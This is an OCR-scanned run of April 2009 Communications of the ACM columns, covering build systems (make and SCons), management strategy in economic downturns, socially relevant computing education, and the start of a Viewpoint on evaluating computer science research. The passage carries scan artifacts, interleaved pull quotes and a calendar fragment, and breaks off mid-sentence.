programmer downtime, mostly made 
up of programmers playing games in 
the hallway, buying questionable items 
on the Web, and learning yo-yo tricks. 
All fine pursuits of course—I learned at 
least five yo-yo tricks on one job when 
it took 20 minutes to build a piece of 
software, and the build locked up the 


machine we all used for our work. Of | 
course such crippling times are in the — 
past now, with the advent of speedy | 
CPUs, memory, and disks there is no | 
longer any wasted programmer time, | 
and we can all depend on a quick com- 
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pile/link phase. Uh, perhaps not. 
There are several reasons why peo- 
ple switch build systems. I think the 
most common one is that people hate 
and fear Makefiles. Other than the mis- 
named autotools there is probably no 
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more maligned component in a build | 


system, and with good reason. While a 
simple Makefile is easy to read, a large 
software system requires a set of inter- 


locking, and usually undocumented, | 


Makefiles that can be as difficult to un- 
derstand as modern architecture, and 
quite often is just as pretty to look at. 
Pull out just one piece and the whole 
edifice will come crashing down upon 
your head. The complexity of a system 


of Makefiles does not, normally, come | 


from some perverse turn of mind of 


the authors, but is in fact due to three | 


problems. The first is that dependency 
analysis, which is what the make pro- 
gram does, is a non-trivial exercise; the 
second is that Makefiles and build sys- 
tems are generally not designed, they 
are accreted; and the third is that the 


build system is usually stretched to do | 


all kinds of things that were not origi- 
nally foreseen. 

In the beginning was the Makefile, 
and it was good. It contained at most 
a few targets and a handful of source 
files. The rules to determine what 
should be built and when were straight- 
forward and all was right with “make 
world.” Over time all software systems 
grow and so the Makefile becomes 
the root of a tree of Makefiles that are 
spread across a set of directories. Next 
the include directive is used, and then 
chaos ensues. The tree that was rooted 
in the original Makefile becomes a set 
of creeping vines, with a strong resem- 
blance to poison ivy because no one 
wants to touch it. 

A typical build system not only takes 
source files and turns them into binary 


programs, but it may also be co-opted | 


to produce documentation from the 


source code, perform pre-checkin test- 


ing, and so forth. Every time you add 
a new responsibility to the system you 
must tweak it in some way, which usu- 


ally has unintended side effects. Even- | 


tually the Makefiles become so complex 
that they’re impossible for new users 
to modify, and even experienced users 
make mistakes because modifications 
are likely to be infrequent. Just as with 
code, engineers rarely document their 
Makefiles, as a matter of fact they’re 
likely never documented, even if the 
code is. The most common documen- 
tation for a build system consists of the 
rather unhelpful “type make<rtn>,” 
which works in the typical case but 


26 COMMUNICATIONS OF THE ACM APRIL 2009 


Every time you 
add anew 
responsibility to 
the system you 
must tweak it in 
some way, 
which usually 
has unintended 
side effects. 


gives no information as to how to de- 
bug a problem in the make system. 
Speaking of debugging, this is one 
of the places where the make program 
fails miserably. While it does have a 
command line flag to say “don’t do 
what I say, just show me what you’d do” 
as well as another command line flag 
to show debugging information, the 
output is usually so voluminous that it 
is unusable, and you wind up deleting 
and commenting lines in the Make- 
file until your bug is hidden, because 
removing lines doesn’t actually make 


| the bug go away. Debugging Makefiles 


can make you tear your hair out, and for 
what, you probably just wanted to add 
a build option or a new file to your sys- 
tem and now you’ve wasted two hours 


with your Makefiles. So, Makefiles are | 
ugly and make people nervous and they | 
tend to start scratching themselves | 


absent-mindedly if you ask them to fix 
them. 


Ifyou think make is bad, well,SCons | 


is certainly more interesting. It seems 


that what make lacked was a scripting | 
language, since we all know that add- | 


ing a language to a system will make 
it easier to use! SCons is written in 


| Python and Python is the language in 


which its SConstruct files—the equiv- 
alent of Makefiles—are written. Much 
like make if you want to do something 
simple with SCons it’s pretty easy to 
do so. If you thought that a complex 
set of Makefiles was difficult to un- 
derstand, try reading a complex set of 
SConstruct files. You’ll not only need 
to load up the mental context for your 
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project, you’ll also need to load your 
brain with Python. Now, don’t get me 
wrong, Python is a fine thing, I code in 
it frequently, but I don’t want to have to 
hack Python to get my software builds 
going. Having recently been exposed 
to SCons I can say that I don’t prefer it 
over make. Although the system I was 
working with had supposedly been 
extended to build code with profiling 
turned on that extension was clearly 
not working. When I asked another 
engineer how he built the system with 
profiling his reply was, “I just hack it.” 
“OK,” I thought to myself, “let’s see if 
I can just fix this.” After all, I was go- 
ing to need profiled code for quite a 
while and it seemed dumb of me to 
check out an extra copy of our tree just 
to have what should be possible with 
a compiler flag. Had I known what 


| lay ahead, and were I a less stubborn 


engineer, I would have checked out 
another copy of the tree. I was deter- 
mined to “do things right” and there- 
in lies the road to madness. It took 
about four hours to load up the proper 
mental context, and to understand 
the interlocking SConstruct files. Af- 
ter many detours and chasing several 
wild geese, I was able to get my profile 
flags correctly into the build system. 
Strangely enough the number of lines 
I changed was less than 10, but finding 
which 10 lines was the interesting part. 
If I had not already been a Python pro- 
grammer it would have probably taken 
days to get this to work. 

Don’t get me wrong, SCons certainly 
has some interesting features, includ- 
ing built-in support for object caching, 
but I would be hard-pressed to call it an 
improvement over make. My advice to 
you is to stick with what you have, that 
is if you can, in particular since you say 
the system is a legacy system. And my 
advice to those who wish to make my 
life easier by changing basic tools is to 
study the existing tools very carefully 
and to figure out which changes really 
help and which changes are just there 
for the sake of change. 

KV 


George V. Neville-Neil (kv@acm.org) is the proprietor of 
Neville-Neil Consulting and a member of the ACM Queue 


| Editorial Board. He works on networking and operating 


systems code for fun and profit; teaches courses’on 
various programming-related subjects, and encourages 
your comments, quips, and code snips pertaining to his 
Communications column. 
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and Management 
Strategies for Difficult (and 
Darwinian) Economic Times 


How the axiom of survival of the fittest applies in 
the context of a global economic downturn. 


HARLES DARWIN HAS had con- 
siderable impact not only 
on the field of biology but 
also on theories of industry 
evolution and management. 
Within sociology departments and 
business schools, for example, during 
the 1970s and 1980s there emerged a 
strain of “population ecologists” that 
continues to influence much of the re- 
search on organizations and industries 
today. These scholars see a Darwinian 
process of survival that occurs at the 


“population” (the industry) level and | 


has little to do with the actions (or in- 
actions) of individual managers and 
firms. The argument, in simple form, 
is that most companies are unable to 
adapt to major change and that suc- 
cessful companies are mainly those 
whose structural characteristics hap- 
pen to match well with demands of the 
new environment.’ For example, most 
mainframe computer companies were 
unable to adapt to small machines 
and distributed computing, and so 


a_ The early most important works on this topic 
are Michael Hannan and John Freeman, “The 


Population Ecology of Organizations,” The | 
American Journal of Sociology 82, 5 (May 1977), | 


929-964; Howard Aldrich, Organizations and 
Environments, Stanford University Press, Palo 
Alto, CA, originally published 1979, classic edi- 
tion 2008. See also Michael Hannan and John 
Freeman, Organizational Ecology, Harvard Uni- 
versity Press, Cambridge, MA, 1989. 


they disappeared. General Motors and 
other automobile makers that cannot 
efficiently operate at low production 
volumes and make money with small, 
fuel-efficient vehicles with tiny profit 
margins will face the same fate as 
vacuum tube producers that could not 
adapt to transistors. 
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Let me say up front that I do not com- 
pletely agree with the population ecolo- 
gist view. I have worked with many com- 
panies since the 1980s and believe the 
actions of managers had an important 
impact on performance and survival. I 
also teach in a business school where, 
we presume, it is worthwhile teaching 
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MBA candidates something about man- 
agement. But it seems true that many 
organizations do not seem to be able to 
change, and that Darwinian processes 
take place as industries mature, com- 
panies fail, and industries consolidate 
over time. As I have written elsewhere, 
the U.S. has seen the number of publicly 
listed software product companies drop 
from over 400 in 1998 to less than 150 
in 2006. The number of U.S.-listed IT 
services companies has experienced a 
similar consolidation.” If we look care- 
fully at other industries—computer 
hardware, semiconductors, and _ tele- 
communications equipment, as well as 
automobiles—we see similar declines 
in the number of firms over time.‘ 
Many of these industries will evolve 
and change, and even rebound as new 
competitors and technologies appear. 
U.S.-based companies like RCA and 


GE thought the consumer electronics | 


and computer hardware businesses 
were mature by the early 1970s, and 
exited—missing enormous opportu- 
nities, ranging from VCRs to PCs and 
Internet services. So it is dangerous to 
assume that all industries will mature, 


consolidate, and decline. But what are | 
managers to do when they face difficult | 


economic times in their businesses— 
especially if, in the long run, theorists 
tell us the managers’ individual actions 
may have little to do with the survival of 
their firms? 

First, they should believe in Dar- 
win—the fittest and the luckiest are 
most likely to survive. Government pro- 
tection or subsidies are likely only to 
delay the inevitable. At the same time, 
however, managers need not believe 
in the extreme views of the population 
ecologists. Though change is difficult, 
something will separate the survivors 
from the failures. It may sometimes be 
luck or random processes (the market 
equivalent of genetic mutations). But 
managers cannot take that chance. 


They must assume their actions are | 
relevant and may well make the differ- | 


ence between survival and failure. So 


b Michael Cusumano, “The Changing Software 
Business: Moving from Products to Services,” 
IEEE Computer 41, 1 (Jan. 2008), 78-85. 


c See Fernando Suarez and James Utterback, 
“Dominant Designs and the Survival of 
Firms,” Strategic Management Journal 16, 6 
(June 1995), 415-430. 
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er ree 
The companies that 
survive for the very 
long term are likely 

to be the smartest 

as well as the 
financially fittest. 


what managers do or do not do is more, 
not less, important in difficult eco- 


| nomic times, though the best manag- 


ers are probably those who foresee and 
respond to the subtle hints of a chang- 
ing environment before radical change 
and economic calamity actually set in. 

Second, once in the throes of an 
economic crisis, managers must do all 
they can “to save the mother ship” and 
make sure they will live to fight another 
day. Most companies have a set of core 
activities and people, and then periph- 
eral activities and people. The extra 
weight may be fine to have around in 
good times and usually is justified as 
“diversification” or “future growth ar- 
eas.” But, in bad times, the non-core 
areas are likely to be cash drains and 
management distractions, and can eas- 
ily turn into fatal liabilities. So, when 
sales start declining, managers should 
use this period as an opportunity to 
trim waste and wishful thinking and 
get back to the strongest foundations 
of their companies. 

The following example is illustrative 
of the decisions that must be made un- 
der difficult economic circumstances. 
I consulted for a particular software 
vendor that vastly expanded its product 
lines during the Internet boom, grow- 
ing extremely fast but accumulating 
hundreds of millions of dollars in loss- 
es that it viewed as an investment in the 
future. By the time the Internet bubble 
burst, the company’s lineup had bal- 
looned to some 144 distinct products, 
with a huge cash drain because thou- 
sands of salespeople, product manag- 
ers, product engineers, quality staff, 
and field consultants were needed to 
design, deliver, and support all these 
products. I got the finance department 
to find out exactly which products were 
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selling and which were not. We con- 
cluded that customers were really only 
buying 12 products. Revenues purport- 
ed to come from the other products in 
fact were subsidies that came from li- 
censing those 12 products in bundles 
with the other 132 products. My recom- 
mendation was to get rid of 80%-90% 
of the company’s products and _ per- 
sonnel, which I thought would ensure 
that at least the core of the company 


| would survive. The management team 


resisted. Eventually, it took five years, 
a delisting from the stock market, near 
bankruptcy, and many senior-position 
departures before the company ulti- 
mately downscaled. It is a shadow of its 
former self but has survived to compete 
(or sell itself) another day. 

In addition to scaling back to the 
strongest product or service lines, sav- 
ing the mother ship means saving as 
many of the best people as you can. 
Simply cutting staff across the board 
makes no sense for most technol- 
ogy businesses because they depend 
so much on intellectual capital. Fur- 
thermore, if managers have to borrow 
money continually or get repeated 
cash infusions from their investors or 
their governments, then they are likely 
to have little or no negotiating power. 
If they do get additional money, it will 
be on Draconian terms—and manag- 
ers should prefer to deal with Darwin 
rather than Draco (the ancient Greek 
lawmaker who favored very harsh pun- 
ishments even for minor offenses). 

Finally, I have a third reeommenda- 
tion for managers: Continue to look 
for opportunities to grow in areas of 
strength. As long as survival of the 
mother ship seems secure, then com- 


| panies should use whatever resources 


they can afford to take advantage of the 
environment. Weak competitors will 
also be contracting but should be worse 
off, and their customers and talented 
employees are fair game. The compa- 
nies that survive for the very long term 
are likely to be the smartest as well as 
the financially fittest: managers must 
be able to anticipate as well as exploit 
change in difficult economic times. @& 


Michael Cusumano (cusumano@mit.edu) is Sloan 
Management Review Distinguished Professor of 
Management and Engineering Systems at the MIT 
Sloan School of Management and School of Engineering 
in Cambridge, MA. 


Copyright held by author. 
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Computing as 
Social Science 


Changing the way computer science is taught in college by encouraging 


students to develop solutions to socially relevant problems. 


decline in computer science 
enrollments nationwide,* and 
it began to increasingly bother 
me as I prepared for the fall se- 
mester last year. With each new fresh- 
man class I worry that fewer students are 
choosing a career in computer science, 


and it’s no stretch of the imagination to | 


think it’s an image problem. Not only 
are we not getting the word out to high 
schools, but I believe we’re losing stu- 
dents in the first year of college as well. 
And it’s because we don’t offer students 
the idea that computer science is social, 
relevant, important, and caring, and 
thus we lose their interest. There might 
in fact be studies that show this, or per- 
haps not, but it’s something I feel. 

I began my last summer break as I 
do almost every year, looking through 
textbooks for something usable for a 
fall course in programming. I teach 
Java, which is more than adequate for 
new programmers to learn everything 
good and bad about addressing a com- 
puter. What they learn is that comput- 


ers never do what we want, but only | 


what we tell them to do. And what we 


tell them to do ina freshman program- | 
ming course is too often dull. Write to — 


the operator, print out the results of a 
calculation, order some list, and all too 
often the message, calculation, and list 
are irrelevant. How can I get them in- 
terested? I’m determined at the start 
of every semester to have a batch of 


a_ See http://www.cra.org/wp/index.php?p=105. 


HAVE BEEN concerned with the | 


| To learn more about David's story, see http://www.sociallyrelevantcomputing.org/. 


eye-opening, to-the-point, significant 
examples, lessons, and problems. 

And so I look through the textbooks 
and the examples and sample pro- 
grams, and I become aware of an obses- 
sion with animals. In the first 10 text- 
books I’ve skimmed, I’ve learned how 
to count ducks, categorize puppies, 
separate cows from horses, manage a 


pet store, create a cyber-pet, add fish to | 


a bowl, and so it goes. This can’t possi- 
bly be the least bit interesting to a fresh- 
man who wants to learn computing. 

I go back through the textbooks in- 
tentionally avoiding animal references 
and instead look for something else. 
I find games, plenty of them: Tetris, 
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Othello, checkers, tic-tac-toe, even a 
good approximation of chess moves, 
which is wonderful if you come to col- 
lege to play games. I’m not even sure 
what programming principle they’re 
trying to teach, and in my best attempt 
at empathy with an incoming fresh- 
man, my eyes glaze over. I’m bored, 
and I have a vested interest. How can 
a student possibly find interest and 


| relevance in this stuff? The texts rely 


solely on the student to be interested 
enough in programming to overcome 
the banality. We all know that practice 
is more fun than theory, but our at- 
tempts at practice aren’t real. 

I move on...let’s see...a doughnut 
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effect to autistic children, and many 
more systems constantly evolving. All 
of this technology and creative energy 


counter to show iterations, a pizza mak- | 
er to construct a list, a lemonade stand 
to demonstrate databases. If I was a stu- 


There isn’t 


dent, beginning these important four 


years, and I was taught programming _ 
via doughnut machines, I would quit | 
and go do something important. Major | 


in some field that had an impact. Even 
the sterile environment of pure mathe- 
matics has me counting and measuring 
planets and populations. Sociology and 
psychology would have me charting be- 
haviors. Chemistry and physics have me 
connected to the environment. Comput- 
ing as portrayed in the literature has me 
running a pet store, playing games, or 
eating. That would seem to be it. There 
isn’t a textbook out of the 60 I have on 
my shelf that makes me see computing 
as socially relevant. 

And so the message is just not get- 
ting out there. Students’ firsthand ex- 
perience with computers—their mu- 
sic and their phones—is accepted and 
reinforced by the image we portray in 
school—one of unrelenting banality 
and geekdom—and potential comput- 


er science students do not see them- | 


selves as having a greater impact. 

At the University of Buffalo we have 
two senior-level courses that require 
teams to create real systems for real cli- 


ents. They are introduced to the wider | 
_ years to speak on the phone. And the 


community of people with disabilities 
and told to make a difference. That’s 
it. Those are the instructions. Improve 
the quality of life of someone less able 
than you. If you can’t figure it out, you 
fail. So don’t fail. 


A group of students tacked a sign up | 
at a school for handicapped children | 


that said “Student Inventors Available 
Free. Is there something you need? 
Call us.” And they heard from a mother 
whose daughter could not use a comput- 
er because she had no fine motor skills. 
She could move her arms but not her 
fingers. So they made her a trackball out 
of a basketball, and wrote games that 
use the wide swing of her arms as she ro- 
tated the basketball. It’s not perfect, but 
they were immersed and involved, and 


they visited with the family and they de- | 
livered a prototype. And no one will ever | 
convince them that computer science is | 
| light-and-sound system (the students | 


not social science, because outside the 
world of trivia we feed students in their 
freshman year, it certainly is. 

Now people in the community call 
us. That’s how my students met David, 
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a textbook out 

of the 60 I have 
on my shelf that 
makes me see 
computing as 
socially relevant. 


who was 43, suffered a stroke at age 27, | 


and hadn’t been able to speak since. 
He communicated with his nurses by 
pointing to a sheet of paper that was 
taped to his wheelchair. It had letters, 
words, and short phrases, and after 
much practice, a nurse or therapist 
could almost decipher what he want- 
ed to say. So our students transferred 
that sheet of paper to a tablet PC, and 
when David touches a word, the com- 
puter speaks it. How difficult is that? 
Easier than counting doughnuts. The 
night they delivered that system, David 


called me at home with his new voice | 


and thanked me. And said he waited 15 


pictures I saw later of the event clearly 
showed students crying. 

Every once ina while, a student will 
say “I can’t find a project,” and I tell 


them to read the newspaper or con- | 


sult other news sources. That itself 
sounds banal but it’s not: right be- 
low the surface of a news item, there 


is most likely a problem to be solved. | 


Find someone or something in trou- 
ble, and save it. That’s how we found 
the number-one killer of firefighters 
on the job: it’s not fire, smoke, or Dal- 
matian attack; it’s heart attack. And 
so now we have a system that moni- 
tors vital signs and displays the statis- 
tics on a 3D model of a fire scene as 
the firefighters traverse it.” 


We have remote-controlled wheel- | 


chairs, videoconferencing for home- 
bound and hospital-bound children, a 


call DISCO) that teaches cause-and- 


b_ See http://www.sociallyrelevantcomputing.org 
/images/pic17.jpg. 
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is at our fingertips, but to sample our 
craft in the popular literature, you 
would think we were cyber pets on one 
end, artificial intelligence on the other, 
and nothing useful in between. 

So back to the textbooks and the 
freshman year. In the senior-level cours- 
es, you can see the difference between 
simply relaying a difficult concept 
(teachers know when that lightbulb 
goes off in a student’s head) and emo- 
tionalizing that concept (that’s a whole 
different look behind their eyes, and 
probably why teachers become teach- 
ers). How do we get that same reaction? 
It’s probably as much for me as for 
them that I want them to see comput- 
ing as a craft for the greater good. I have 
to teach my students counting, so I will 
forego puppies and have them design 
a tamperproof voting system. When 
they learn two-dimensional arrays it 
will be to monitor the flow of pollution 
through Lake Erie. Databases? Not fish 
in a bowl but it will be drug interactions. 
My good friend Devika Subramanian at 


| Rice University taught me how to use 


disaster evacuation planning to teach 
optimal paths and routing instead of 
using chess. I can’t find any of these in 
a textbook that teaches CS1, so I’ll have 
to invent them. 

I know that writing a textbook is 
difficult. But so is teaching, and so is 
learning. 


Further Reading 

1. Buckley, M. et al. Benefits of using socially relevant 
projects in computer science and engineering 
education. In Proceedings of the Special Interest 
Group on Computer Science Education Conference, 
2004; http://www.sociallyrelevantcomputing.org/ 
SIGCSE2004SociallyRelevantProjects.pdf 

2. Buckley, M., Schindler, K., Kershner, H., and Alphonce, 
C. Using socially relevant projects in a capstone design 
course in computer engineering. In Proceedings of the 
American Society for Engineering Education Annual 
Conference, 2004; http://portal.acm.org/citation. 
cfm?id=1028174.971463. 

3. Nordlinger, N., Subramanian, D., and Buckley, M. 
Socially relevant computing. In Proceedings of 
the Special Interest Group on Computer Science 
Education Conference, 2008; http://www.cs.rice. 
edu/~devika/SIGCSEFinal.pdf. 

4. Schindler, K., Buckley, M., Kershner, H., and Alphonce, 
C. Partnering with social service organizations to 
develop socially relevant projects in computer science 
and engineering. In Proceedings of the International 
Conference on Engineering Education, 2004; http:// 
www.sociallyrelevantcomputing.org/ICEE2004 pdf. 


Michael Buckley (mikeb@cse.buffalo.edu) is the director 
of the Center for Socially Relevant Computing at the 
University of Buffalo, NY. 
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Viewpoint 


Research Evaluation 
for Computer Science 


Reassessing the assessment criteria and techniques traditionally used 
in evaluating computer science research effectiveness. 


CADEMIC CULTURE Is chang- 
ing. The rest of the world, 
including university man- 
agement, increasingly as- 
sesses scientists; we must 
demonstrate worth through indicators, 
often numeric. While the extent of the 
syndrome varies with countries and in- 
stitutions, La Fontaine’s words apply: 
“not everyone will die, but everyone is hit.” 
Tempting as it may be to reject numeri- 
cal evaluation, it will not go away. The 
problem for computer scientists is that 
assessment relies on often inappropri- 
ate and occasionally outlandish crite- 
ria. We should at least try to base it on 
metrics acceptable to the profession. 
In discussions with computer sci- 
entists from around the world, this 
risk of deciding careers through dis- 
torted instruments comes out as a 
top concern. In the U.S. it is mitigat- 
ed by the influence of the Computing 
Research Association’s 1999 “best 
practices” report.* In many other 
countries, computer scientists must 
repeatedly explain the specificity of 
their discipline to colleagues from 
other areas, for example in hiring and 
promotion committees. Even in the 
U.S., the CRA report, which predates 
widespread use of citation databases 
and indexes, is no longer sufficient. 


a For this and other references, and the source 
of the data behind the results, see an expand- 
ed version of this column at http://se.ethz. 
ch/~ meyer/publications/cacm/research_eval- 
uation.pdf. 


Informatics Europe, the associa- 
tion of European CS departments,” 
has undertaken a study of the issue, 


| of which this Viewpoint column is a 


preliminary result. Its views commit 
the authors only. For ease of use the 
conclusions are summarized through 
10 concrete recommendations. 


verrvrrrerree 
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Our focus is evaluation of individu- 
als rather than departments or labo- 
ratories. The process often involves 
many criteria, whose importance var- 
ies with institutions: grants, number 
of Ph.D.s and where they went, com- 
munity recognition such as keynotes 
at prestigious conferences, best pa- 


| per and other awards, editorial board 


memberships. We mostly consider a 
particular criterion that always plays 
an important role: publications. 


Research Evaluation 

Research is a competitive endeavor. 
Researchers are accustomed to con- 
stant assessment: any work submit- 
ted—even, sometimes, invited—is 


b_ See http://www.informatics-europe.org. 
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peer-reviewed; rejection is frequent, 
even for senior scientists. Once 
published, a researcher’s work will 
be regularly assessed against that 
of others. Researchers themselves 
referee papers for publication, par- 
ticipate in promotion committees, 
evaluate proposals for funding agen- 
cies, answer institutions’ requests 
for evaluation letters. The research 
management edifice relies on assess- 
ment of researchers by researchers. 
Criteria must be fair (to the extent 
possible for an activity circumscribed 
by the frailty of human judgment); 
openly specified; accepted by the tar- 
get scientific community. While other 
disciplines often participate in evalua- 
tions, it is not acceptable to impose cri- 
teria from one discipline on another. 


Computer Science 
Computer science concerns itself with 
the representation and processing of 
information using algorithmic tech- 
niques. (In Europe the more common 
term is Informatics, covering a slightly 
broader scope.) CS research includes 
two main flavors, not mutually exclu- 
sive: Theory, developing models of 
computations, programs, languages; 
Systems, building software artifacts and 
assessing their properties. In addition, 
domain-specific research addresses 
specifics of information and comput- 
ing for particular application areas. 

CS research often combines aspects 
of engineering and natural sciences as 
well as mathematics. This diversity is 
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part of the discipline’s attraction, but | scientists will cite Knuth’s The Art of 


also complicates evaluation. 

Across these variants, CS research 
exhibits distinctive characteristics, 
captured by seminal concepts: algo- 
rithm, computability, complexity, 
specification/implementation duali- 
ty, recursion, fixpoint, scale, function/ 
data duality, static/dynamic duality, 
modeling, interaction...Not all scien- 
tists from other disciplines realize the 
existence of this corpus. Computer 
scientists are responsible for enforc- 
ing its role as basis for evaluation: 

1. Computer science is an original 


discipline combining science and engi- 
neering. Researcher evaluation must be | 


adapted to its specificity. 


The CS Publication Culture 


| In the computer science publication 


culture, prestigious conferences are 
a favorite tool for presenting original 
research—unlike disciplines where the 
prestige goes to journals and conferenc- 
es are for raw initial results. Acceptance 
rates at selective CS conferences hover 


| between 10% and 20%; in 2007-2008: 


> ICSE (software engineering): 13% 
>» OOPSLA (object technology): 19% 
> POPL (programming languages): 18% 
Journals have their role, often to 
publish deeper versions of papers 
already presented at conferences. 
While many researchers use this op- 
portunity, others have a successful 
career based largely on conference 


| papers. It is important not to use 
| journals as the only yardsticks for 


computer scientists. 
Books, which some disciplines do 
not consider important scientific con- 


| tributions, can bea primary vehicle in 


CS. Asked to name the most influen- 
tial publication ever, many computer 


The research 
management edifice 
relies on assessment 


| of researchers by 


researchers. 
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Computer Programming. Seminal con- 
cepts such as Design Patterns first be- 
came known through books. 

2. A distinctive feature of CS pub- 
lication is the importance of selective 
conferences and books. Journals do not 
necessarily carry more prestige. 

Publications are not the only sci- 
entific contributions. Sometimes 
the best way to demonstrate value is 
through software or other artifacts. 
The Google success story involves a 
fixpoint algorithm: Page Rank, which 
determines the popularity of a Web 
page from the number of links to it. 
Before Google was commercial it was 


_ research, whose outcome included a 


paper on Page Rank and the Google 
site. The site had—beyond its future 
commercial value—a research value 
that the paper could not convey: dem- 
onstrating scalability. Had the authors 
continued as researchers and come up 
for evaluation, the software would have 
been as significant as the paper. 

Assessing such contributions is del- 
icate: a million downloads do not prove 
scientific value. Publication, with its 
peer review, provides more easily de- 
codable evaluation grids. In assessing 
CS and especially Systems research, 
however, publications do not suffice: 

3. To assess impact, artifacts such as soft- 
ware can be as important as publications. 

Another issue is assessing individu- 
al contributions to multi-author work. 
Disciplines have different practices 
(2007-2008): 

> Nature over a year: maximum co- 
authors per article 22, average 7.3 

> American Mathematical Monthly: 6, 2 

>» OOSPLA and POPL: 7, 2.7 

Disciplines where many coauthors 
are the norm use elaborate name-or- 
dering conventions to reflect individual 
contributions. This is not the standard 
culture in CS (except for such common 
practices as listing a Ph.D. student first 
in ajoint paper with the advisor. 

4, The order in which a CS publica- 
tion lists authors is generally not signift- 
cant. In the absence of specific indica- 
tions, it should not serve as a factor in 
researcher evaluation. 


Bibliometry 
In assessment discussions, numbers 


| typically beat no numbers; hence the 


' temptation to reduce evaluations to 


such factors as publication counts, | 


| An issue of concern to 


measuring output, and citation counts, 
measuring impact (and derived mea- 
sures such as indexes, discussed next). 

While numeric criteria trigger 
strong reactions,° alternatives have 
problems too: peer review is strongly 
dependent on evaluators’ choice and 
availability (the most competent are 
often the busiest), can be biased, and 
does not scale up. The solution is in 
combining techniques, subject to hu- 
man interpretation: 

5. Numerical measurements such as 
publication-related counts must never 


be used as the sole evaluation instru- | 


ment. They must be filtered through 
human interpretation, particularly to 
avoid errors, and complemented by peer 
review and assessment of outputs other 
than publications. 

Measures should not address vol- 
ume but impact. Publication counts 
only assess activity. Giving them any 
other value encourages “write-only” 


journals, speakers-only conferences, | 


and Stakhanovist research profiles fa- 
voring quantity over quality. 

6. Publication counts are not ade- 
quate indicators of research value. They 
measure productivity, but neither im- 
pact nor quality. 

Citation counts assess impact. They 
rely on databases such as ISI, CiteSeer, 
ACM Digital Library, Google Scholar. 
They, too, have limitations: 

> Focus. Publication quality is just 
one aspect of research quality, impact 
one aspect of publication quality, cita- 
tions one aspect of impact. 

» Identity. Misspellings and man- 
gling of authors’ names lose citations. 
Names with special characters are par- 
ticularly at risk. If your name is Kréten- 
fanger, do not expect your publications 
to be counted correctly. 

» Distortions. Article introductions 
heavily cite surveys. The milestone 
article that introduced NP-complete- 
ness has far fewer citations than a 
later tutorial. 

» Misinterpretation. Citation may 
imply criticism rather than apprecia- 
tion. Many program verification arti- 


c D. Parnas, “Stop the Numbers Game,” Com- 
mun. ACM 50, 11 (Nov. 2007), 19-21; available 
at http://tinyurl.com/2z652a. Parnas mostly 
discusses counting publications, but deals 
briefly with citation counts. 


computer scientists 
is the tendency to 
use publication 
databases that do not 
adequately cover CS. 


cles cite a famous protocol paper—to 
show that their tools catch an equally 
famous error in the protocol. 

> Time. Citation counts favor older 
contributions. 

> Size. Citation counts are absolute; im- 
pact is relative to each community’s size. 

» Networking. Authors form mutual 
citation societies. 

> Bias. Some authors hope (unethi- 
cally) to maximize chances of accep- 
tance by citing program committee 
members. 

The last two examples illustrate 
the occasionally perverse effects of 
assessment techniques on research 
work itself. 

The most serious problem is data 
quality; no process can be better than its 


| data. Transparency is essential, as well as 


error-reporting mechanismsand prompt 
response (as with ACM and DBLP): 

7. Any evaluation criterion, especial- 
ly quantitative, must be based on clear, 
published criteria. 

This remains wishful thinking for 
major databases. The methods by 
which Google Scholar and ISI select 
documents and citations are not pub- 
lished or subject to debate. 

Publication patterns vary across 
disciplines, reinforcing the comment 
that we should not judge one by the 
rules of another: 

8. Numerical indicators must not 
serve for comparisons across disciplines. 

This rule also applies to the issue 
(not otherwise addressed here) of eval- 
uating laboratories or departments 
rather than individuals. 


CS Coverage in Major Databases 
An issue of concern to computer sci- 


entists is the tendency to use publica- 
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The 18th International World 
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edu.pe 


April 26-30 


_ International Conference on the 
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Email: ejw@cs.ucsc.edu 
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Email: Diana@cs.sfu.ca 


| May5-8 
14th International Conference 
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_ and Digital Media, 


Stuttgard, Germany, 
Contact: Thomas Haegele, 
Email: thomas. haegele@ 
filmakademie.de 


May 10-13 
ACM 2009 International 
Conference on Supporting 
Group Work, 

Sanibel Island, FL, 
Sponsored: SIGCHI, 
Contact: Erling Carl Havn, 
Email: havn@man.dtu.dk 
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putes these indexes from Google Schol- 
ar data. Such indexes cannot be more 
credible than the underlying databas- 
es; results should always be checked 
manually for context and possible dis- 


tion databases that do not adequately 
cover CS, such as Thomson Scientific’s 
ISI Web of Science. 

The principal problem is what ISI 
counts. Many CS conferences and most 


Our focus is 
evaluation of 
individuals rather 


books are not listed; conversely, some 
publications are included indiscrimi- 
nately. The results make computer 
scientists cringe.* Niklaus Wirth, Tur- 
ing Award winner, appears for minor 
papers from indexed publications, 
not his seminal 1970 Pascal report. 
Knuth’s milestone book series, with an 
astounding 15,000 citations in Google 
Scholar, does not figure. Neither do 
Knuth’s three articles most frequently 
cited according to Google. 

Evidence of ISI’s shortcomings for 
CS is “internal coverage”: the percent- 
age of citations of a publication in the 


same database. ISI’s internal cover- | 


age, over 80% for physics or chemistry, 
is only 38% for CS. 

Another example is Springer’s Lec- 
ture Notes in Computer Science, which 
ISI classified until 2006 as a journal. 
A great resource, LNCS provides fast 
publication of conference proceed- 
ings and reports. Lumping all into a 
single “journal” category was absurd, 
especially since ISI omits top non- 
LNCS conferences: 

> The International Conference on 


Software Engineering (ICSE), the top | 


conference in a field that has its own 
ISI category, is not indexed. 

>» An LNCS-published workshop at 
ICSE, where authors would typically 
try out ideas not yet ready for ICSE 
submission, was indexed. 

ISI indexes SIGPLAN Notices, an 


unrefereed publication devoting or-— 


dinary issues to notes and letters and 
special issues to proceedings of such 
conferences as POPL. POPL papers ap- 


pear in ISI—on the same footing as a | 


reader’s note in a regular issue. 

The database has little understand- 
ing of CS. Its 50 most cited CS refer- 
ences include “Chemometrics in food 
science,” from a “Chemometrics and 
Intelligent Laboratory Systems” jour- 
nal. Many CS entries are not recogniz- 
able as milestone contributions. The 
cruelest comparison is with CiteSeer, 


whose Most Cited list includes many | 


publications familiar to all computer 
scientists; it has not a single entry in 


d_ AILISI searches as of mid-2008. 
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/ common with the ISI list. 


than departments 
or laboratories. 


ISI’s “highly cited researchers” list 
includes many prestigious computer 
scientists but leaves out such iconic 
names as Wirth, Parnas, Knuth and all 
the 10 2000-2006 Turing Award winners 
except one. Since ISI’s process provides 
noclearrole forcommunity assessment, 
the situation is unlikely to improve. 

The inevitable deficiencies of alter- 
natives pale in consideration: 

9. In assessing publications and cita- 


tions, ISI Web of Science is inadequate for — 


most of CS and must not be used. Alterna- 
tives include Google Scholar, CiteSeer, 
and (potentially) ACM’s Digital Library. 
Anyone in charge of assessment 
should know that attempts to use ISI 
for CS will cause massive opposition 
and may lead to outright rejection 
of any numerical criteria, including 


- more reasonable ones. 


Assessment Formulae 
A recent trend is to rely on numeri- 
cal measures of impact, derived from 
